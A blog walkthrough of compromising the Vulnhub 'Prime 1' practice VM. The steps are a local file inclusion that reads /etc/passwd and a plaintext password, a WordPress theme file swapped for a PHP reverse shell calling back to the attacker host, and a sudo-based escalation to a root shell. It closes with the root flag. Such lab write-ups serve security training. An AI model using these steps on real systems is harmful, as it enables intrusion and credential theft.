Vulnhub

Vulnhub | Prime 1

In this post, we take a look at the steps I took to completely compromise the Prime 1 host from Vulnhub.

2 years ago   •   11 min read

By 0xBEN
Table of contents

Nmap Scan

# Nmap 7.91 scan initiated Wed Oct  6 11:37:45 2021 as: nmap -T4 -p- -A -oA scan-advanced 10.9.9.25
Nmap scan report for ubuntu.cyber.range (10.9.9.25)
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT     ADDRESS
1   0.20 ms pfSense.cyber.range (10.0.0.1)
2   0.34 ms ubuntu.cyber.range (10.9.9.25)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct  6 11:37:55 2021 -- 1 IP address (1 host up) scanned in 9.96 seconds





Service Enumeration

HTTP

This target is running a minimal amount of services – a web server on TCP/80 and a SSH server running on TCP/22. The choice is clear that I should look at the web server first. I load up the site, check the source, check for robots.txt. No immediate leads

File and Directory Enumeration

target=10.9.9.25
gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 100 -o gobuster-out -x php,html

/image.php            (Status: 200) [Size: 147]  
/wordpress            (Status: 301) [Size: 310] [--> http://10.9.9.25/wordpress/]  
/dev                  (Status: 200) [Size: 131]                                     
/javascript           (Status: 301) [Size: 311] [--> http://10.9.9.25/javascript/]  
/index.php            (Status: 200) [Size: 136]





/wordpress

Check the page source for a WordPress version number <meta name="generator" content="WordPress 5.2.2"/>. I can see one of the author names is victor.





/dev

No additional subdirectories or files here.





/secrets.txt

Looks like you have got some secrets.

Ok I just want to do some help to you. 

Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
 
//see the location.txt and you will get your next move//

Seems like a clue telling us to test parameters on any page with a .php extension. A parameter in this context would be something like http://10.9.9.25/page.php?parameter.





Parameter Testing

I start testing the index.php page first, and try what I think would be a few common parameter names. Looks like the index.php page takes a ?file parameter.

I try http://10.9.9.25/index.php?file=location.txt.

ok well Now you reah at the exact parameter  
  
Now dig some more for next one  
use 'secrettier360' parameter on some other php page for more fun.

Now, we need to test the ?secrettier360 parameter on some other page. There is also an image.php page I could test on. http://10.9.9.25/image.php?secrettier360.

I get a success message – finally you got the right parameter – Let's keep going. Now, I know the correct parameter, let's try passing some common attacks as arguments.





Local File Inclusion (LFI)

curl http://10.9.9.25/image.php?secrettier360=../../../../../../../../etc/passwd
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin

This line sticks out to me:

saket:x:1001:1001:find password.txt file in my directory:/home/saket:

Looks like we should check /home/saket/password.txt.

curl http://10.9.9.25/image.php?secrettier360=../../../../../../../../home/saket/password.txt

follow_the_ippsec

Unfortunately, this is not a valid SSH credential. However, it might be a valid password for WordPress.





WordPress Login

I remember earlier on the WordPress site, we found a possible username – victor. Let's try logging into the WordPress admin portal.

  • Username: victor
  • Password: follow_the_ippsec

Success!





Exploit

This was a compound exploit:

  • A local file inclusion exposed a plaintext password in a user's home directory
  • Which allowed me to login to WordPress admin
  • Now, I have found a WordPress theme with a writeable file called secret.php

We can replace the PHP theme contents with a PHP reverse shell. When the theme page is loaded, the server will execute the PHP reverse shell code instead.

php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell
Contribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.
GitHubpentestmonkey
$ip = '10.0.0.2';  // CHANGE THIS
$port = 443;       // CHANGE THIS

Now, back in Kali, I will start a listener on TCP/443.

Looking at the homepage, I can see the theme is being loaded from http://10.9.9.25/wordpress/wp-content/themes/twentynineteen/. If I load the page http://10.9.9.25/wordpress/wp-content/themes/twentynineteen/secret.php, the payload will run.

Load the file on the left, catch the payload on the right





Post-Exploitation

User Flag





Enumerate

Current User

Click to expand 
www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /home/saket/enc





Operating System & Kernel

Click to expand 
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial

www-data@ubuntu:/$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux





Users & Groups

Click to expand 
www-data@ubuntu:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin

www-data@ubuntu:/$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,victor
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:victor
floppy:x:25:
tape:x:26:
sudo:x:27:victor
audio:x:29:pulse
dip:x:30:victor
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:victor
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-timesync:x:102:
systemd-network:x:103:
systemd-resolve:x:104:
systemd-bus-proxy:x:105:
input:x:106:
crontab:x:107:
syslog:x:108:
netdev:x:109:
messagebus:x:110:
uuidd:x:111:
ssl-cert:x:112:
lpadmin:x:113:victor
lightdm:x:114:
nopasswdlogin:x:115:
ssh:x:116:
whoopsie:x:117:
mlocate:x:118:
avahi-autoipd:x:119:
avahi:x:120:
bluetooth:x:121:
scanner:x:122:saned
colord:x:123:
pulse:x:124:
pulse-access:x:125:
rtkit:x:126:
saned:x:127:
victor:x:1000:
sambashare:x:128:victor
mysql:x:129:
saket:x:1001:





Interesting Files

/opt/backup/server_database/backup_pass

your password for backup_database file enc is 

"backup_password"


Enjoy!

www-data can run /home/saket/enc with passwordless sudo. I try running the script with the password backup_password and it generates these files:

-rw-r--r-- 1 root root   237 Oct  6 22:01 enc.txt
-rw-r--r-- 1 root root   123 Oct  6 22:01 key.txt

I inspect the contents of both files.

cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=

cat key.txt
I know you are the fan of ippsec.

So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.

The contents of enc.txt is an AES-256 hash. The contents of key.txt tells us how to reverse the hash. We must make an MD5 hash of the string ippsec and then use that as the key to reverse the hash.

Use custom PowerShell function to create a MD5 hash of the string ippsec

PSToolbox/Convert-StringToHash.ps1 at master · 0xBEN/PSToolbox
PowerShell module containing a set of generally useful tools. - PSToolbox/Convert-StringToHash.ps1 at master · 0xBEN/PSToolbox
GitHub0xBEN
. ./Convert-StringToHash.ps1

Convert-StringToHash -HashingAlgorithm MD5 -String 'ippsec'

366a74cb3c959de17d61db30591c39d1

Now, I can use openssl to reverse the hash in enc.txt.

openssl enc -a -d -in enc.txt -K '33363661373463623363393539646531376436316462333035393163333964310a' -aes-256-ecb 2>/dev/null
  • -a input is base64
  • -d decoding
  • -in input file
  • -K key to decrypt (must be in hex notation) see man openssl-enc
    • The initial key -- MD5 hash of ippsec -- is not valid hex key
    • echo md5hash | xxd -p to output the string in hex bytes
  • -aes-256-ecb cipher type
Dont worry saket one day we will reach to
our destination very soon. And if you forget 
your username then use your old password
==> "tribute_to_ippsec"

Victor,





Privilege Escalation

Lateral to Saket

Using the information from the enc.txt file, I moved laterally to the saket user with the password, tribute_to_ippsec.

I check for additional sudo privileges.

(root) NOPASSWD: /home/victor/undefeated_victor

Try running the file listed in the output.

sudo /home/victor/undefeated_victor

if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found

The /tmp/challenge: not found error tells me that I should be able to create this file and use script to escalate to the root user account.

echo '#!/bin/bash' > /tmp/challenge
echo '/bin/bash -ip' >> /tmp/challenge
chmod +x /tmp/challenge

Try running the file again.





root.txt

b2b17036da1de94cfb024540a8e7075a

Spread the word

Keep reading